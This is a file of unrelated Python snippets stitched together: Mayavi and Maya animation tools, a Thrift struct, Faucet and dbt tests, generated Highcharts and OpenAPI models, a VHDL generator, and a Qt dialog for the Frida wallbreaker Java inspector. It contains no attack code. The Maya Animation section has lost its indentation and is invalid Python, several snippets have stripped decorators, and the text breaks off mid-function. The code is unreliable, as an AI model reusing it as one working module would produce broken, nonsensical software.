    filter = Instance(tvtk.Object, allow_none=False, record=True)

    # Default UI: show the TVTK filter's own editor inline.
    view = View(Group(Item(name='filter', style='custom', resizable=True, show_label=False), springy=True), scrollable=True, resizable=True)

    def setup_pipeline(self):
        """Wire up trait-change notification so parameter edits on the TVTK
        filter trigger a data update."""
        f = self.filter
        if (f is not None):
            f.on_trait_change(self.update_data)

    def update_pipeline(self):
        """Reconnect the TVTK filter to the first input and push outputs."""
        inputs = self.inputs
        fil = self.filter
        # Nothing to do until both an input and a filter exist.
        if ((len(inputs) == 0) or (fil is None)):
            return
        self.configure_connection(fil, inputs[0])
        fil.update()
        self._set_outputs([fil])

    def update_data(self):
        """Re-execute the TVTK filter and notify downstream consumers."""
        if ((len(self.inputs) == 0) or (not self.running)):
            return
        self.filter.update()
        # Firing data_changed propagates the update downstream.
        self.data_changed = True

    def _filter_changed(self, old, new):
        """Static trait handler: move the update_data listener from the old
        filter object to the new one."""
        if (old is not None):
            old.on_trait_change(self.update_data, remove=True)
        new.on_trait_change(self.update_data)
        # NOTE(review): the pipeline is only rebuilt when REPLACING an
        # existing filter; the first assignment relies on update_pipeline
        # being called elsewhere — confirm this is intended.
        if (old is not None):
            self.update_pipeline()
# Restored stripped decorator: the bare `_from_version('1.8')` call before the
# def discarded its result, which matches the decorator-stripping pattern seen
# elsewhere in this file; registering the updater requires the `@` form.
@_from_version('1.8')
def update_1_8(sim_dict: dict) -> dict:
    """Update a version-1.8 simulation dict to the next schema version.

    Rewrites CustomFieldSource monitors whose field_dataset values carry the
    legacy 'XR.DATAARRAY' type tag to the new 'ScalarFieldDataArray' tag.
    Mutates and returns ``sim_dict``.
    """
    def fix_missing_scalar_field(mnt_dict: dict) -> dict:
        # Legacy files stored the raw xarray type name; map it to the new one.
        for (key, val) in mnt_dict['field_dataset'].items():
            if isinstance(val, str) and (val == 'XR.DATAARRAY'):
                mnt_dict['field_dataset'][key] = 'ScalarFieldDataArray'
        return mnt_dict
    iterate_update_dict(update_dict=sim_dict, update_types={'CustomFieldSource': fix_missing_scalar_field})
    return sim_dict
class Animation(object):
def equalize_node_speed(cls):
start_frame = int(pm.playbackOptions(q=1, min=1))
end_frame = int(pm.playbackOptions(q=1, max=1))
selected_node = pm.selected()[0]
node = pm.duplicate(selected_node, un=1, rr=1)[0]
node.rename(('%s_Equalized#' % selected_node.name()))
if (not node.hasAttr('speed')):
node.addAttr('speed', at='double')
pm.currentTime(start_frame)
pm.setKeyframe(node.speed)
prev_pos = node.t.get()
pos_data = []
rot_data = []
for i in range(start_frame, (end_frame + 1)):
pm.currentTime(i)
current_pos = node.t.get()
pos_data.append(current_pos)
rot_data.append(node.r.get())
speed = (current_pos - prev_pos).length()
prev_pos = current_pos
node.speed.set(speed)
pm.setKeyframe(node.speed)
camera_path = pm.curve(d=3, p=pos_data)
camera_path_curve = camera_path.getShape()
pm.rebuildCurve(camera_path_curve, ch=1, rpo=1, rt=0, end=1, kr=0, kcp=0, kep=1, kt=0, s=((end_frame - start_frame) + 1), d=3, tol=0.01)
curve_cv_positions = camera_path_curve.getCVs()
curve_cv_positions.pop(1)
curve_cv_positions.pop((- 2))
prev_pos = curve_cv_positions[0]
for (i, j) in enumerate(range(start_frame, end_frame)):
pm.currentTime(j)
current_pos = curve_cv_positions[i]
node.t.set(curve_cv_positions[i])
node.speed.set((current_pos - prev_pos).length())
pm.setKeyframe(node.speed)
prev_pos = current_pos
def bake_all_constraints(cls):
command = 'bakeResults -simulation true -t "{start}:{end}" -sampleBy 1 -oversamplingRate 1 -disableImplicitControl true -preserveOutsideKeys true -sparseAnimCurveBake false -removeBakedAttributeFromLayer false -removeBakedAnimFromLayer false -bakeOnOverrideLayer false -minimizeRotation true -at "tx" -at "ty" -at "tz" -at "rx" -at "ry" -at "rz" {objects};'
start_frame = int(pm.playbackOptions(q=1, min=1))
end_frame = int(pm.playbackOptions(q=1, max=1))
all_transforms = []
for node in pm.ls(type='constraint'):
all_transforms += node.outputs(type='transform')
object_names = ' '.join([node.longName() for node in all_transforms])
bake_command = command.format(start=start_frame, end=end_frame, objects=object_names)
pm.mel.eval(bake_command)
def bake_alembic_animations(cls):
command = 'bakeResults -simulation true -t "{start}:{end}" -sampleBy 1 -oversamplingRate 1 -disableImplicitControl true -preserveOutsideKeys true -sparseAnimCurveBake false -removeBakedAttributeFromLayer false -removeBakedAnimFromLayer false -bakeOnOverrideLayer false -minimizeRotation true -at "tx" -at "ty" -at "tz" -at "rx" -at "ry" -at "rz" {objects};'
start_frame = int(pm.playbackOptions(q=1, min=1))
end_frame = int(pm.playbackOptions(q=1, max=1))
all_transforms = []
for node in pm.ls(type='AlembicNode'):
all_transforms += node.outputs(type='transform')
object_names = ' '.join([node.longName() for node in all_transforms])
bake_command = command.format(start=start_frame, end=end_frame, objects=object_names)
pm.mel.eval(bake_command)
def delete_base_anim_layer(cls):
base_layer = pm.PyNode('BaseAnimation')
base_layer.unlock()
pm.delete(base_layer)
def smooth_component_animation(cls, ui_item):
frame_range = pm.textFieldButtonGrp(ui_item, q=1, tx=1)
pm.mel.eval(('oySmoothComponentAnimation(%s)' % frame_range))
def smooth_selected_keyframes(cls, iteration=10):
from anima.utils import smooth_array
node = pm.keyframe(q=1, sl=1, n=1)[0]
keyframe_indices = pm.keyframe(q=1, sl=1, iv=1)
keyframe_values = pm.keyframe(q=1, sl=1, vc=1)
for i in range(iteration):
keyframe_values = smooth_array(keyframe_values)
for (i, v) in zip(keyframe_indices, keyframe_values):
pm.keyframe(node, e=1, index=i, vc=v)
def cam_2_chan(cls, startButton, endButton):
start = int(pm.textField(startButton, q=True, tx=True))
end = int(pm.textField(endButton, q=True, tx=True))
cam_to_chan(start, end)
def create_alembic_command(cls):
from_top_node = pm.checkBox('from_top_node_checkBox', q=1, v=1)
cls.create_alembic(from_top_node)
def create_alembic(cls, from_top_node=1):
import os
root_flag = '-root %(node)s'
mel_command = 'AbcExport -j "-frameRange %(start)s %(end)s -ro -stripNamespaces -uvWrite -wholeFrameGeo -worldSpace %(roots)s -file %(path)s";'
current_path = pm.workspace.path
abc_path = os.path.join(current_path, 'cache', 'alembic')
try:
os.makedirs(abc_path)
except OSError:
pass
abc_full_path = pm.fileDialog2(startingDirectory=abc_path)
def find_top_parent(node):
parents = node.listRelatives(p=1)
parent = None
while parents:
parent = parents[0]
parents = parent.listRelatives(p=1)
if parents:
parent = parents[0]
else:
return parent
if (not parent):
return node
else:
return parent
if abc_full_path:
abc_full_path = abc_full_path[0]
abc_full_path = (os.path.splitext(abc_full_path)[0] + '.abc')
selection = pm.ls(sl=1)
nodes = []
for node in selection:
if from_top_node:
node = find_top_parent(node)
if (node not in nodes):
nodes.append(node)
roots = []
for node in nodes:
roots.append((root_flag % {'node': node.fullPath()}))
roots_as_string = ' '.join(roots)
start = int(pm.playbackOptions(q=1, minTime=1))
end = int(pm.playbackOptions(q=1, maxTime=1))
rendered_mel_command = (mel_command % {'start': start, 'end': end, 'roots': roots_as_string, 'path': abc_full_path})
pm.mel.eval(rendered_mel_command)
def copy_alembic_data(cls, source=None, target=None):
selection = pm.ls(sl=1)
if ((not source) or (not target)):
source = selection[0]
target = selection[1]
source_nodes = source.listRelatives(ad=1, type=(pm.nt.Mesh, pm.nt.NurbsSurface))
target_nodes = target.listRelatives(ad=1, type=(pm.nt.Mesh, pm.nt.NurbsSurface))
source_node_names = []
target_node_names = []
for node in source_nodes:
name = node.name().split(':')[(- 1)].split('|')[(- 1)]
source_node_names.append(name)
for node in target_nodes:
name = node.name().split(':')[(- 1)].split('|')[(- 1)]
target_node_names.append(name)
lut = []
for (i, target_node) in enumerate(target_nodes):
target_node_name = target_node_names[i]
try:
index = source_node_names.index(target_node_name)
except ValueError:
pass
else:
lut.append((source_nodes[index], target_nodes[i]))
for (source_node, target_node) in lut:
if isinstance(source_node, pm.nt.Mesh):
in_attr_name = 'inMesh'
out_attr_name = 'outMesh'
else:
in_attr_name = 'create'
out_attr_name = 'worldSpace'
conns = source_node.attr(in_attr_name).inputs(p=1)
if conns:
for conn in conns:
if isinstance(conn.node(), pm.nt.AlembicNode):
(conn >> target_node.attr(in_attr_name))
break
else:
(source_node.attr(out_attr_name) >> target_node.attr(in_attr_name))
def bake_component_animation_to_locator(cls):
    """Bake the per-frame centroid of the selected components onto a new locator.

    For every frame in the playback range the average world-space position of
    the selected (flattened) components is written to a freshly created space
    locator and keyed on its translate channels. The current time is restored
    to the range start when done.
    """
    start = int(pm.playbackOptions(q=1, minTime=1))
    end = int(pm.playbackOptions(q=1, maxTime=1))
    vertices = pm.ls(sl=1, fl=1)
    locator = pm.spaceLocator()
    for frame in range(start, (end + 1)):
        pm.currentTime(frame)
        # xform returns a flat [x0, y0, z0, x1, y1, z1, ...] list.
        point_positions = pm.xform(vertices, q=1, ws=1, t=1)
        # Integer division: the list length is always a multiple of 3
        # (was float division feeding a hand-rolled functools.reduce sum).
        point_count = (len(point_positions) // 3)
        px = (sum(point_positions[0::3]) / point_count)
        py = (sum(point_positions[1::3]) / point_count)
        pz = (sum(point_positions[2::3]) / point_count)
        locator.t.set(px, py, pz)
        pm.setKeyframe(locator.tx)
        pm.setKeyframe(locator.ty)
        pm.setKeyframe(locator.tz)
    pm.currentTime(start)
def bake_locator_animation_to_component(cls, vertices=None, locators=None, start=None, end=None):
    """Bake locator world positions onto mesh vertices, one key per frame.

    :param vertices: MeshVertex (or list of) to move; taken from the selection
        together with *locators* when either is missing.
    :param locators: Transform (or list of) whose world position drives the
        matching vertex (zipped pairwise with *vertices*).
    :param start: first frame; defaults to the playback range start.
    :param end: last frame (inclusive); defaults to the playback range end.
    """
    # BUGFIX: test against None instead of truthiness -- ``not start`` also
    # triggered for a legitimate start/end frame of 0.
    if (start is None):
        start = int(pm.playbackOptions(q=1, minTime=1))
    if (end is None):
        end = int(pm.playbackOptions(q=1, maxTime=1))
    if ((not vertices) or (not locators)):
        # Split the flattened selection into transforms and mesh vertices.
        selection = pm.ls(sl=1, fl=1)
        locators = [n for n in selection if isinstance(n, pm.nt.Transform)]
        vertices = [n for n in selection if isinstance(n, pm.MeshVertex)]
    if (not isinstance(vertices, list)):
        vertices = [vertices]
    if (not isinstance(locators, list)):
        locators = [locators]
    for frame in range(start, (end + 1)):
        pm.currentTime(frame)
        for (vertex, locator) in zip(vertices, locators):
            pos = pm.xform(locator, q=1, ws=1, t=1)
            pm.xform(vertex, ws=1, t=pos)
            pm.setKeyframe(vertex)
    # Leave the scene at the start of the baked range.
    pm.currentTime(start)
def attach_follicle(cls):
    """Create a follicle pinned at each selected mesh surface point.

    For every selected component a follicle node is created, driven by the
    component's mesh, parked at that component's UV, and its transform is
    driven by the follicle's output translate/rotate.
    """
    pnts = pm.ls(sl=1)
    for pnt in pnts:
        mesh = pnt.node()
        follicle = pm.createNode('follicle')
        (mesh.worldMesh[0] >> follicle.inputMesh)
        # BUGFIX: query the UV of the *current* point; the original used
        # ``pnts[0].getUV()`` which pinned every follicle at the first
        # selected point's UV.
        uv = pnt.getUV()
        follicle.parameterU.set(uv[0])
        follicle.parameterV.set(uv[1])
        follicle_t = follicle.getParent()
        (follicle.outTranslate >> follicle_t.t)
        (follicle.outRotate >> follicle_t.r)
def set_range_from_shot(cls):
    """Set the playback range from the scene's first shot node.

    Falls back to the cut_in/cut_out of the nearest parent Shot task of the
    current Stalker version; errors out when neither source is available.
    """
    start_frame = None
    end_frame = None
    shot_nodes = pm.ls(type='shot')
    if shot_nodes:
        first_shot = shot_nodes[0]
        start_frame = first_shot.getAttr('startFrame')
        end_frame = first_shot.getAttr('endFrame')
    else:
        from anima.dcc import mayaEnv
        version = mayaEnv.Maya().get_current_version()
        if version:
            from stalker import Shot
            # Walk the task hierarchy from the closest parent upwards.
            task_parents = version.task.parents
            task_parents.reverse()
            for candidate in task_parents:
                if not isinstance(candidate, Shot):
                    continue
                pm.warning('No shot node in the scene, using the Shot task!!!')
                start_frame = candidate.cut_in
                end_frame = candidate.cut_out
                break
    if (start_frame is None) or (end_frame is None):
        pm.error('No shot node in the scene, nor the task is related to a Shot!')
    else:
        pm.playbackOptions(ast=start_frame, aet=end_frame, min=start_frame, max=end_frame)
def export_alembics_on_farm(cls):
    """Submit an Afanasy alembic-export job for the current Stalker version."""
    from anima.dcc.mayaEnv import Maya, afanasy_publisher
    version = Maya().get_current_version()
    if not version:
        raise RuntimeError('This scene is not a Stalker version!')
    afanasy_publisher.submit_alembic_job(
        version.absolute_full_path, project_code=version.task.project.code
    )
def playblast_on_farm(cls):
    """Submit an Afanasy playblast job for the current Stalker version."""
    from anima.dcc.mayaEnv import Maya, afanasy_publisher
    version = Maya().get_current_version()
    if not version:
        raise RuntimeError('This scene is not a Stalker version!')
    afanasy_publisher.submit_playblast_job(
        version.absolute_full_path, project_code=version.task.project.code
    )
class TestButtonEditorSimpleDemo(unittest.TestCase):
    """UI test driving the ButtonEditor simple demo end to end."""

    def test_button_editor_simple_demo(self):
        demo = runpy.run_path(DEMO_PATH)['demo']
        tester = UITester()
        with tester.create_ui(demo) as ui:
            # Click five times, verifying the counter trait after each click.
            button = tester.find_by_name(ui, 'my_button_trait')
            for expected_count in range(1, 6):
                button.perform(MouseClick())
                self.assertEqual(demo.click_counter, expected_count)
            # The displayed text follows the trait value...
            counter_field = tester.find_by_name(ui, 'click_counter')
            self.assertEqual(counter_field.inspect(DisplayedText()), '5')
            # ...including direct trait assignment.
            demo.click_counter = 10
            self.assertEqual(counter_field.inspect(DisplayedText()), '10')
def run_adb_command(command: str) -> bool:
    """Run *command* through ``adb``, returning True on success.

    Raises ADBException when adb is not installed; subprocess failures are
    delegated to ``adb_error_handler``.
    """
    full_command = f'adb {command}'
    if not is_adb_installed():
        raise ADBException(ADBExceptionTypes.ADB_NOT_INSTALLED)
    try:
        # Elevate first, then run the requested command quietly.
        adb_root()
        subprocess.run(full_command, shell=True, check=True, text=True, capture_output=True)
    except subprocess.CalledProcessError as err:
        adb_error_handler(err)
    return True
def extractThenthvoidWordpressCom(item):
    """Parse a release item from thenthvoid.wordpress.com.

    Returns None for previews or titles without chapter/volume info, a
    release message for recognized tags, and False when nothing matches.
    """
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
    if ('preview' in item['title'].lower()) or not (chp or vol):
        return None
    tagmap = {
        'PRC': ('PRC', 'translated'),
        'Loiterous': ('Loiterous', 'oel'),
    }
    for tagname, (name, tl_type) in tagmap.items():
        if tagname in item['tags']:
            return buildReleaseMessageWithType(
                item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type
            )
    return False
class setOption_result():
    """Generated Thrift result struct for the ``setOption`` call (void, no fields)."""
    # Filled in by the generated module when accelerator metadata is available.
    thrift_spec = None
    thrift_field_annotations = None
    thrift_struct_annotations = None
    def isUnion():
        # NOTE(review): generated code -- `self` is intentionally absent here.
        return False
    def read(self, iprot):
        """Deserialize from *iprot*, preferring the C fastproto decoder when usable."""
        # Fast path: binary protocol with C-readable transport and metadata present.
        if ((isinstance(iprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocol) and (iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL))) and isinstance(iprot.trans, TTransport.CReadableTransport) and (self.thrift_spec is not None) and (fastproto is not None)):
            fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0)
            self.checkRequired()
            return
        # Fast path: compact protocol variant of the same check.
        if ((isinstance(iprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocol) and (iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL))) and isinstance(iprot.trans, TTransport.CReadableTransport) and (self.thrift_spec is not None) and (fastproto is not None)):
            fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2)
            self.checkRequired()
            return
        # Slow path: skip every field until STOP (this struct has no fields).
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if (ftype == TType.STOP):
                break
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()
        self.checkRequired()
    def checkRequired(self):
        # No required fields to validate.
        return
    def write(self, oprot):
        """Serialize to *oprot*, preferring the C fastproto encoder when usable."""
        if ((isinstance(oprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocol) and (oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL))) and (self.thrift_spec is not None) and (fastproto is not None)):
            oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0))
            return
        if ((isinstance(oprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocol) and (oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL))) and (self.thrift_spec is not None) and (fastproto is not None)):
            oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2))
            return
        # Slow path: empty struct body.
        oprot.writeStructBegin('setOption_result')
        oprot.writeFieldStop()
        oprot.writeStructEnd()
    def __repr__(self):
        # L stays empty -- there are no fields to render.
        L = []
        padding = (' ' * 4)
        return ('%s(\n%s)' % (self.__class__.__name__, ',\n'.join(L)))
    def __eq__(self, other):
        if (not isinstance(other, self.__class__)):
            return False
        return (self.__dict__ == other.__dict__)
    def __ne__(self, other):
        return (not (self == other))
    # Python 3 disables inherited __hash__ when __eq__ is defined; restore identity hash.
    if (not six.PY2):
        __hash__ = object.__hash__
def manifest_paths(app_dir, flavours):
    """Return the manifest/gradle files that actually exist for *app_dir*.

    Checks the standard AndroidManifest.xml and gradle build-file locations,
    plus a per-flavour manifest for every flavour except the literal 'yes'.
    """
    base = Path(app_dir)
    candidates = [
        base / 'AndroidManifest.xml',
        base / 'src/main/AndroidManifest.xml',
        base / 'src/AndroidManifest.xml',
        base / 'build.gradle',
        base / 'build-extras.gradle',
        base / 'build.gradle.kts',
    ]
    candidates.extend(
        base / 'src' / flavour / 'AndroidManifest.xml'
        for flavour in flavours
        if flavour != 'yes'
    )
    return [candidate for candidate in candidates if candidate.is_file()]
class FaucetUntaggedRestBcastIPv6RouteTest(FaucetUntaggedIPv6RouteTest):
    """IPv6 route test variant with restricted broadcast ARP/ND on every port.

    Inherits all behavior; only overrides CONFIG to set
    ``restricted_bcast_arpnd: true`` on each of the four test ports.
    """
    CONFIG = '\n    nd_neighbor_timeout: 2\n    max_resolve_backoff_time: 1\n    interfaces:\n        %(port_1)d:\n            native_vlan: 100\n            restricted_bcast_arpnd: true\n        %(port_2)d:\n            native_vlan: 100\n            restricted_bcast_arpnd: true\n        %(port_3)d:\n            native_vlan: 100\n            restricted_bcast_arpnd: true\n        %(port_4)d:\n            native_vlan: 100\n            restricted_bcast_arpnd: true\n'
def initialize():
    """Populate the global reloc table from the configured reloc-address files.

    Each file is parsed line by line; ``//`` starts a comment. A reloc line is
    a space-separated list of ``attr:value`` pairs with required attributes
    ``rom``, ``reloc`` and ``symbol`` and an optional ``addend``. Malformed
    lines are reported through ``log`` (log.error presumably aborts -- the
    code continues as if it does not return).
    """
    global all_relocs
    all_relocs = {}
    for path in options.opts.reloc_addrs_paths:
        if (not path.exists()):
            continue
        with path.open() as f:
            sym_addrs_lines = f.readlines()
        prog_bar = progress_bar.get_progress_bar(sym_addrs_lines)
        prog_bar.set_description(f'Loading relocs ({path.stem})')
        line: str
        for (line_num, line) in enumerate(prog_bar):
            # Strip comments ('//' to end of line) and surrounding whitespace.
            line = line.strip()
            line = line.split('//')[0]
            line = line.strip()
            if (line == ''):
                continue
            rom_addr = None
            reloc_type = None
            symbol_name = None
            addend = None
            for info in line.split(' '):
                # Tokens without ':' are ignored (e.g. stray whitespace splits).
                if (':' not in info):
                    continue
                if (info.count(':') > 1):
                    log.parsing_error_preamble(path, line_num, line)
                    log.write(f"Too many ':'s in '{info}'")
                    log.error('')
                (attr_name, attr_val) = info.split(':')
                if (attr_name == ''):
                    log.parsing_error_preamble(path, line_num, line)
                    log.write(f"Missing attribute name in '{info}', is there extra whitespace?")
                    log.error('')
                if (attr_val == ''):
                    log.parsing_error_preamble(path, line_num, line)
                    log.write(f"Missing attribute value in '{info}', is there extra whitespace?")
                    log.error('')
                try:
                    # base=0 lets int() accept 0x..., 0o..., decimal, etc.
                    if (attr_name == 'rom'):
                        rom_addr = int(attr_val, 0)
                        continue
                    if (attr_name == 'reloc'):
                        reloc_type = attr_val
                        continue
                    if (attr_name == 'symbol'):
                        symbol_name = attr_val
                        continue
                    if (attr_name == 'addend'):
                        addend = int(attr_val, 0)
                        continue
                except:
                    # Report context, then re-raise the original conversion error.
                    log.parsing_error_preamble(path, line_num, line)
                    log.write(f"value of attribute '{attr_name}' could not be read:")
                    log.write('')
                    raise
            if (rom_addr is None):
                log.parsing_error_preamble(path, line_num, line)
                log.error(f"Missing required 'rom' attribute for reloc")
            if (reloc_type is None):
                log.parsing_error_preamble(path, line_num, line)
                log.error(f"Missing required 'reloc' attribute for reloc")
            if (symbol_name is None):
                log.parsing_error_preamble(path, line_num, line)
                log.error(f"Missing required 'symbol' attribute for reloc")
            reloc = Reloc(rom_addr, reloc_type, symbol_name)
            if (addend is not None):
                reloc.addend = addend
            # Duplicate ROM addresses across files are a hard error.
            if (reloc.rom_address in all_relocs):
                log.parsing_error_preamble(path, line_num, line)
                log.error(f"Duplicated 'rom' address for reloc: 0x{reloc.rom_address:X}")
            add_reloc(reloc)
class OptionSeriesPolygonSonificationTracksMappingLowpassFrequency(Options):
    """Generated Highcharts options wrapper for
    ``series.polygon.sonification.tracks.mapping.lowpass.frequency``.

    NOTE(review): each getter/setter pair below shares a name; in the
    original generated source these are presumably ``@property`` /
    ``@<name>.setter`` pairs whose decorators were stripped during
    extraction -- confirm against the upstream generator before editing.
    """
    # Getter/setter pair for the mapping function.
    def mapFunction(self):
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    # Getter/setter pair for the mapping target.
    def mapTo(self):
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    # Getter/setter pair for the maximum value.
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    # Getter/setter pair for the minimum value.
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    # Getter/setter pair for the 'within' option.
    def within(self):
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
class TlsActivationResponse(ModelNormal):
    """Generated OpenAPI model for a TLS activation response.

    NOTE(review): the bare ``_property`` and ``_js_args_to_python_args``
    lines below look like decorators whose ``@cached_`` / ``@convert_``
    prefixes were lost in extraction -- confirm against the generated
    upstream source before modifying.
    """
    allowed_values = {}
    validations = {}
    _property
    def additional_properties_type():
        # Types accepted for properties not listed in attribute_map.
        lazy_import()
        return (bool, date, datetime, dict, float, int, list, str, none_type)
    _nullable = False
    _property
    def openapi_types():
        # Maps attribute name -> tuple of accepted types.
        lazy_import()
        return {'data': (TlsActivationResponseData,)}
    _property
    def discriminator():
        return None
    attribute_map = {'data': 'data'}
    read_only_vars = {}
    _composed_schemas = {}
    _js_args_to_python_args
    def _from_openapi_data(cls, *args, **kwargs):
        """Construct an instance from raw API data (read-only attrs allowed)."""
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        self = super(OpenApiModel, cls).__new__(cls)
        if args:
            raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
        for (var_name, var_value) in kwargs.items():
            # Optionally drop unknown keys when the configuration says so.
            if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
                continue
            setattr(self, var_name, var_value)
        return self
    required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes'])
    _js_args_to_python_args
    def __init__(self, *args, **kwargs):
        """Construct an instance from user code (read-only attrs rejected)."""
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        if args:
            raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
        for (var_name, var_value) in kwargs.items():
            if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
                continue
            setattr(self, var_name, var_value)
            # Unlike _from_openapi_data, user construction rejects read-only vars.
            if (var_name in self.read_only_vars):
                raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.')
class Vhdl(Generator, Jinja2):
    """VHDL register-map generator rendering the regmap_vhdl.j2 template."""

    def __init__(self, rmap=None, path='regs.vhd', read_filler=0, interface='axil', **args):
        super().__init__(rmap, **args)
        self.path = path
        self.read_filler = read_filler
        self.interface = interface

    def validate(self):
        """Validate base settings plus the chosen bus interface."""
        super().validate()
        supported = ['axil', 'apb', 'amm', 'lb']
        assert (self.interface in supported), ("Unknown '%s' interface!" % self.interface)

    def generate(self):
        """Render the VHDL register map to ``self.path``."""
        self.validate()
        template_vars = {
            'corsair_ver': __version__,
            'rmap': self.rmap,
            'module_name': utils.get_file_name(self.path),
            'read_filler': utils.str2int(self.read_filler),
            'interface': self.interface,
            'config': config.globcfg,
        }
        self.render_to_file('regmap_vhdl.j2', template_vars, self.path)
def test_anomalous_all_columns_anomalies(test_id: str, dbt_project: DbtProject):
    """A burst of NULL superheroes on the test day should fail only that column."""
    yesterday = datetime.utcnow().date() - timedelta(1)
    (test_date, *training_dates) = generate_dates(base_date=yesterday)
    # Anomalous rows: three NULLs on the test date.
    rows: List[Dict[str, Any]] = [
        {TIMESTAMP_COLUMN: test_date.strftime(DATE_FORMAT), 'superhero': None}
        for _ in range(3)
    ]
    # Training rows: two named superheroes on every training date.
    rows += [
        {TIMESTAMP_COLUMN: cur_date.strftime(DATE_FORMAT), 'superhero': hero}
        for cur_date in training_dates
        for hero in ['Superman', 'Batman']
    ]
    test_results = dbt_project.test(
        test_id, DBT_TEST_NAME, DBT_TEST_ARGS, data=rows, multiple_results=True
    )
    statuses = {res['column_name'].lower(): res['status'] for res in test_results}
    assert statuses == {'superhero': 'fail', TIMESTAMP_COLUMN: 'pass'}
class wallBreakerForm(QDialog, Ui_Wallbreaker):
    """Qt dialog wrapping a Frida "wallbreaker" API for browsing Java classes/objects.

    Left side lists class names (filterable via the class-name text box);
    buttons trigger class/object search and dump, whose textual results are
    appended to the output pane. ``self.api`` is the remote wallbreaker API
    (presumably a Frida script export -- set by the caller; None until then).
    """
    def __init__(self, parent=None):
        super(wallBreakerForm, self).__init__(parent)
        self.setupUi(self)
        self.setWindowOpacity(0.93)
        # Wire buttons and list/text widgets to their handlers.
        self.btnClassSearch.clicked.connect(self.classSearch)
        self.btnClassDump.clicked.connect(self.classDump)
        self.btnObjectSearch.clicked.connect(self.objectSearch)
        self.btnObjectDump.clicked.connect(self.objectDump)
        self.btnClearUI.clicked.connect(self.clearUi)
        self.clearUi()
        self.listClasses.itemClicked.connect(self.ClassItemClick)
        self.txtClassName.textChanged.connect(self.changeClass)
        self.classes = None
        self.api = None
        self._translate = QtCore.QCoreApplication.translate
    def initData(self):
        """Refill the class list widget from ``self.classes``."""
        self.listClasses.clear()
        for item in self.classes:
            self.listClasses.addItem(item)
    def ClassItemClick(self, item):
        # Clicking a list entry copies its name into the class-name box.
        self.txtClassName.setText(item.text())
    def changeClass(self, data):
        """Filter the class list by substring *data* (empty = show all)."""
        if ((self.classes == None) or (len(self.classes) <= 0)):
            return
        self.listClasses.clear()
        if (len(data) > 0):
            for item in self.classes:
                if (data in item):
                    self.listClasses.addItem(item)
        else:
            for item in self.classes:
                self.listClasses.addItem(item)
    def clearUi(self):
        """Blank the class-name box, output pane and address box."""
        self.txtClassName.setText('')
        self.txtSearchData.setPlainText('')
        self.txtAddress.setText('')
    def class_match(self, pattern):
        # Thin passthrough to the remote API.
        return self.api.class_match(pattern)
    def class_use(self, name):
        # The remote call returns JSON text; decode it here.
        return json.loads(self.api.class_use(name))
    def object_get_classname(self, handle):
        return self.api.object_get_class(handle)
    def map_dump(self, handle, pretty_print=False, **kwargs):
        """Render a java.util.Map instance as ``key => value`` lines."""
        result = "{}'s Map Entries {{".format(handle)
        if pretty_print:
            click.secho("{}'s Map Entries ".format(handle), fg='blue', nl=False)
            click.secho('{', fg='red', nl=False)
        pairs = self.api.map_dump(handle)
        for key in pairs:
            result += '\n\t{} => {}'.format(key, pairs[key])
            if pretty_print:
